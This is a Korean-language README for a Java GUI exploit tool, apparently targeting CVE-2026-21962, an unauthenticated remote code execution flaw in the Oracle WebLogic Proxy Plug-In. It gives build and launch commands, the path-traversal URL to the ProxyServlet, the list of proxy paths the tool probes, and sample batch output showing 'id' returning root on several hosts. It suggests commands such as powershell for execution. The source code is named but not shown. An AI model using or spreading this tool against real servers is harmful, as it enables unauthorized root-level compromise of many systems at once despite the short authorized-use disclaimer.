
Java GUI 도구로, Oracle WebLogic Proxy Plug-In의 인증되지 않은 RCE 취약점인 CVE-2026-21962를 악용하여 HTTP를 통한 다중 대상 명령 실행을 가능하게 합니다.
Oracle WebLogic Server Proxy Plug-In RCE(원격 코드 실행) 취약점 악용 도구의 Java GUI 버전입니다.
java-version/
├── pom.xml # Maven 프로젝트 설정 파일
├── README.md # 프로젝트 설명 문서
├── run.bat # Windows 실행 스크립트
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # 프로그램 진입점
├── core/
│ └── Exploit.java # 취약점 악용 핵심 로직
├── gui/
│ └── MainWindow.java # GUI 메인 창
└── util/
└── HttpClient.java # HTTP 요청 도구
프로그램 창에는 다음 영역이 포함됩니다:
입력 매개변수 영역 (상단)
버튼 영역 (중앙)
실행 로그 영역 (하단 왼쪽)
명령 출력 영역 (하단 오른쪽)
cd java-version
mvn clean compile
mvn clean package
패키징된 JAR 파일 위치: target/cve-2026-21962-1.0.0.jar
run.bat 파일을 더블클릭하여 프로그램을 시작합니다.
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[의존성 jar 경로]" com.ashwesker.cve202621962.Main
대상 URL:
http://192.168.1.100:7001
실행 명령:
whoami
대상 URL:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
실행 명령:
id
출력 결과 예시:
[*] 취약점 테스트 시작...
[*] 대상 URL: http://192.168.1.100:7001
[*] 실행 명령: id
[*] 테스트 경로: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] 성공! 상태 코드: 200
[+] 명령 실행 성공!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] 취약점 테스트 시작...
[*] 대상 URL: http://192.168.1.101:7001
[*] 실행 명령: id
[*] 테스트 경로: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] 성공! 상태 코드: 200
[+] 명령 실행 성공!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
프로그램 시작 후 "대상 URL" 텍스트 영역에 대상 서버 주소 입력
http://target:7001 또는 https://oracle-server:4443"실행 명령" 필드에 실행할 명령 입력
whoami, id, powershell -c ... 등"취약점 악용 실행" 버튼 클릭하여 테스트 시작
하단의 "실행 로그"에서 테스트 과정 확인
하단의 "명령 출력"에서 명령 실행 결과 확인
"대상 URL" 텍스트 영역에 여러 대상 주소 입력, 각 줄에 하나씩
http://target1:7001
http://target2:7001
https://target3:4443
"실행 명령" 필드에 실행할 명령 입력
"취약점 악용 실행" 버튼 클릭하여 일괄 테스트 시작
프로그램이 각 대상을 순차적으로 테스트하며, 서로 다른 대상의 출력 결과는 ================ (80개의 등호)로 구분
하단의 "실행 로그"에서 각 대상의 테스트 과정 확인
하단의 "명령 출력"에서 모든 대상의 명령 실행 결과 확인
프로그램이 자동으로 다음 경로를 테스트합니다:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ 경고: 이 도구는 승인된 보안 테스트에만 사용하십시오. 승인 없이 이 도구로 시스템을 공격하는 것은 불법입니다.
Main.java
Exploit.java
MainWindow.java
HttpClient.java
이 프로젝트는 교육 및 보안 연구 목적으로만 사용됩니다.